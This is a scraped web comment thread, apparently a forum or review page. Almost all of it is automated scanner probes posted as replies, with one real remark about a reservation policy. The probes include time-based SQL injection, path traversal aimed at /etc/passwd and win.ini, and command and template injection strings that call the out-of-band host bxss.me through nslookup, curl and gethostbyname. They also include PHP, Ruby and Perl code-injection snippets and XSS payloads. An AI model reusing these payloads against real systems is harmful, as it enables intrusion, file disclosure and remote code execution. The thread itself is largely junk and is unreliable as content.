\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: gomaizo
WEB-INF/web.xml
re: gomaizo
WEB-INF\web.xml
re: gomaizo
1
re: gomaizo
1
re: gomaizo
-1 OR 2+953-953-1=0+0+0+1 --
re: gomaizo
-1 OR 3+953-953-1=0+0+0+1 --
re: gomaizo
-1 OR 2+884-884-1=0+0+0+1
re: gomaizo
-1 OR 3+884-884-1=0+0+0+1
re: gomaizo
-1' OR 2+259-259-1=0+0+0+1 --
re: gomaizo
-1' OR 3+259-259-1=0+0+0+1 --
re: gomaizo
-1' OR 2+941-941-1=0+0+0+1 or 'Qv13GBMe'='
re: gomaizo
-1' OR 3+941-941-1=0+0+0+1 or 'Qv13GBMe'='
re: gomaizo
-1" OR 2+561-561-1=0+0+0+1 --
re: gomaizo
-1" OR 3+561-561-1=0+0+0+1 --
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
0J3yqMsY'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: gomaizo
uU3s0zVQ' OR 765=(SELECT 765 FROM PG_SLEEP(15))--
re: gomaizo
jyXdJ4QT') OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: gomaizo
1spJyIgr')) OR 61=(SELECT 61 FROM PG_SLEEP(15))--
re: gomaizo
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@9ja9S
re: gomaizo
1BSOORSM50
re: gomaizo
response.write(9139044*9126723)
re: gomaizo
'+response.write(9139044*9126723)+'
re: gomaizo
"+response.write(9139044*9126723)+"
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
${10000059+10000369}
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
../
re: gomaizo
)
re: gomaizo
!(()&&!|*|*|
re: gomaizo
redirtest.acx
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
echo czrefh$()\ lwiafq\nz^xyu||a #' &echo czrefh$()\ lwiafq\nz^xyu||a #|" &echo czrefh$()\ lwiafq\nz^xyu||a #
re: gomaizo
&echo tkbjay$()\ hkvqbs\nz^xyu||a #' &echo tkbjay$()\ hkvqbs\nz^xyu||a #|" &echo tkbjay$()\ hkvqbs\nz^xyu||a #
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: gomaizo
'.gethostbyname(lc('hitsg'.'almlieha38da7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(87).chr(121).chr(72).'
re: gomaizo
|echo uedvkd$()\ bftqcd\nz^xyu||a #' |echo uedvkd$()\ bftqcd\nz^xyu||a #|" |echo uedvkd$()\ bftqcd\nz^xyu||a #
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: gomaizo
".gethostbyname(lc("hiteh"."oxmeyeboe21e1.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(83).chr(104).chr(71)."
re: gomaizo
expr 9000135920 - 973365
re: gomaizo
/etc/shells
re: gomaizo
(nslookup -q=cname hitilxpftukrm0acce.bxss.me||curl hitilxpftukrm0acce.bxss.me))
re: gomaizo
../../../../../../../../../../../../../../etc/shells
re: gomaizo
gethostbyname(lc('hitcx'.'uqbbiked70dda.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(74).chr(110).chr(74)
re: gomaizo
$(nslookup -q=cname hitfttijyipefef97b.bxss.me||curl hitfttijyipefef97b.bxss.me)
re: gomaizo
c:/windows/win.ini
re: gomaizo
&nslookup -q=cname hitpjpwdlihxz37702.bxss.me&'\"`0&nslookup -q=cname hitpjpwdlihxz37702.bxss.me&`'
re: gomaizo
bxss.me
re: gomaizo
&(nslookup -q=cname hitbftjvdvtyr8a7f3.bxss.me||curl hitbftjvdvtyr8a7f3.bxss.me)&'\"`0&(nslookup -q=cname hitbftjvdvtyr8a7f3.bxss.me||curl hitbftjvdvtyr8a7f3.bxss.me)&`'
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
|(nslookup -q=cname hitolcevuuslia62e7.bxss.me||curl hitolcevuuslia62e7.bxss.me)
re: gomaizo
http://bxss.me/t/fit.txt?.jpg
re: gomaizo
ctime
sleep
p0
(I30
tp1
Rp2
.
re: gomaizo
`(nslookup -q=cname hitlcpxdoqkip45183.bxss.me||curl hitlcpxdoqkip45183.bxss.me)`
re: gomaizo
;(nslookup -q=cname hitprznjfhkvpf8222.bxss.me||curl hitprznjfhkvpf8222.bxss.me)|(nslookup -q=cname hitprznjfhkvpf8222.bxss.me||curl hitprznjfhkvpf8222.bxss.me)&(nslookup -q=cname hitprznjfhkvpf8222.bxss.me||curl hitprznjfhkvpf8222.bxss.me)
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
|(nslookup${IFS}-q${IFS}cname${IFS}hitdfzelddben08b44.bxss.me||curl${IFS}hitdfzelddben08b44.bxss.me)
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
&(nslookup${IFS}-q${IFS}cname${IFS}hithqlhsvemeyde15c.bxss.me||curl${IFS}hithqlhsvemeyde15c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithqlhsvemeyde15c.bxss.me||curl${IFS}hithqlhsvemeyde15c.bxss.me)&`'
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
${@print(md5(31337))}
re: gomaizo
'"()
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
'&&sleep(27*1000)*qzyhlv&&'
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
"&&sleep(27*1000)*hfoxju&&"
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
'||sleep(27*1000)*uoxnlx||'
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
"||sleep(27*1000)*itlbus||"
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(107).concat(81).concat(105).concat(81)+(require"socket"
Socket.gethostbyname("hitpv"+"plagqeit4ba84.bxss.me.")[3].to_s)+"
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(98).concat(68).concat(115).concat(71)+(require'socket'
Socket.gethostbyname('hitcf'+'tnbmkwym22ed5.bxss.me.')[3].to_s)+'
re: gomaizo
'A'.concat(70-3).concat(22*4).concat(108).concat(77).concat(122).concat(69)+(require'socket'
Socket.gethostbyname('hitss'+'zexzzzet05f7d.bxss.me.')[3].to_s)
re: gomaizo
replies
re: gomaizo
replies�
re: gomaizo
'"
re: gomaizo
replies/.
re: gomaizo
<!--
re: gomaizo
'"()&%<zzz><ScRiPt >pM9L(9020)</ScRiPt>
re: gomaizo
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitrusxezbbyza2dfe.bxss.me")}}
re: gomaizo
'"()&%<zzz><ScRiPt >pM9L(9204)</ScRiPt>
re: gomaizo
9694713
re: gomaizo
3PHgrPFd
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
-1 OR 5*5=25 --
re: gomaizo
-1 OR 5*5=26 --
re: gomaizo
-1 OR 5*5=25
re: gomaizo
-1 OR 5*5=26
re: gomaizo
*if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
-1 waitfor delay '0:0:15' --
re: gomaizo
HUxU8zzn'; waitfor delay '0:0:15' --
re: gomaizo
-1 OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: gomaizo
-1) OR 942=(SELECT 942 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 622=(SELECT 622 FROM PG_SLEEP(15))--
re: gomaizo
xTQ0sFFt' OR 320=(SELECT 320 FROM PG_SLEEP(15))--
re: gomaizo
ocQn0Ue2') OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: gomaizo
FFz2Uh9S')) OR 98=(SELECT 98 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
'"
re: gomaizo
@@mPbM7
re: gomaizo
(select 198766*667891)
re: gomaizo
(select 198766*667891 from DUAL)
They probably changed their reservation policy. I think probably with people now able to travel, they probably have less local guests.
re: guest
QFIE8pyV
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+640-640-1=0+0+0+1
re: guest
-1 OR 3+640-640-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
QeAIk8S7'; waitfor delay '0:0:15' --
re: guest
-5 OR 877=(SELECT 877 FROM PG_SLEEP(15))--
re: guest
-5) OR 800=(SELECT 800 FROM PG_SLEEP(15))--
re: guest
-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
re: guest
hJ3fHgKD' OR 753=(SELECT 753 FROM PG_SLEEP(15))--
re: guest
j4CoGaBN') OR 403=(SELECT 403 FROM PG_SLEEP(15))--
re: guest
UTwoDAOH')) OR 147=(SELECT 147 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@JNDq3
re: guest
2hNpYYsA
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+235-235-1=0+0+0+1
re: guest
-1 OR 3+235-235-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
XilnZtqq'; waitfor delay '0:0:15' --
re: guest
-5 OR 144=(SELECT 144 FROM PG_SLEEP(15))--
re: guest
-5) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
re: guest
-1)) OR 994=(SELECT 994 FROM PG_SLEEP(15))--
re: guest
e4TJUTsC' OR 522=(SELECT 522 FROM PG_SLEEP(15))--
re: guest
3TJP4WTc') OR 504=(SELECT 504 FROM PG_SLEEP(15))--
re: guest
6sqT9kHH')) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@RIZOO
re: guest
1BaYaC0f7eO
re: guest
response.write(9043272*9887847)
re: guest
'+response.write(9043272*9887847)+'
re: guest
"+response.write(9043272*9887847)+"
re: guest
%0abcc:074625.67-22212.67.3698e.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
to@example.com>%0d%0abcc:074625.67-22213.67.3698e.19990.2@bxss.me
re: guest
${10000483+9999515}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
'.gethostbyname(lc('hitqp'.'hffjmqskcc406.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(71).chr(98).chr(90).'
re: guest
)
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
".gethostbyname(lc("hitbh"."qisatmtp713ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(87).chr(114).chr(88)."
re: guest
!(()&&!|*|*|
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
^(#$!@#$)(()))******
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo hekaxt$()\ ihkipa\nz^xyu||a #' &echo hekaxt$()\ ihkipa\nz^xyu||a #|" &echo hekaxt$()\ ihkipa\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo szjfto$()\ bbnzzn\nz^xyu||a #' &echo szjfto$()\ bbnzzn\nz^xyu||a #|" &echo szjfto$()\ bbnzzn\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo jlybry$()\ ordxyc\nz^xyu||a #' |echo jlybry$()\ ordxyc\nz^xyu||a #|" |echo jlybry$()\ ordxyc\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
(nslookup hitcvjyywyfoqe72e5.bxss.me||perl -e "gethostbyname('hitcvjyywyfoqe72e5.bxss.me')")
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
$(nslookup hitjyyqmjvknod3c94.bxss.me||perl -e "gethostbyname('hitjyyqmjvknod3c94.bxss.me')")
re: guest
"+"A".concat(70-3).concat(22*4).concat(114).concat(78).concat(120).concat(76)+(require"socket"
Socket.gethostbyname("hitvs"+"dlvvfkkt72150.bxss.me.")[3].to_s)+"
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&nslookup hiticoggohjno32a35.bxss.me&'\"`0&nslookup hiticoggohjno32a35.bxss.me&`'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(83).concat(112).concat(67)+(require'socket'
Socket.gethostbyname('hitzu'+'jhnidplg540c7.bxss.me.')[3].to_s)+'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&(nslookup hitskuajxudelb0f8b.bxss.me||perl -e "gethostbyname('hitskuajxudelb0f8b.bxss.me')")&'\"`0&(nslookup hitskuajxudelb0f8b.bxss.me||perl -e "gethostbyname('hitskuajxudelb0f8b.bxss.me')")&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
|(nslookup hitxotakiwedmf1040.bxss.me||perl -e "gethostbyname('hitxotakiwedmf1040.bxss.me')")
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
`(nslookup hitvmpocvsivh62ceb.bxss.me||perl -e "gethostbyname('hitvmpocvsivh62ceb.bxss.me')")`
re: guest
';print(md5(31337));$a='
re: guest
/etc/shells
re: guest
file:///etc/passwd
re: guest
;(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")|(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")&(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")
re: guest
c:/windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
/WEB-INF/web.xml
re: guest
${@print(md5(31337))}\
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.print(md5(31337)).'
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\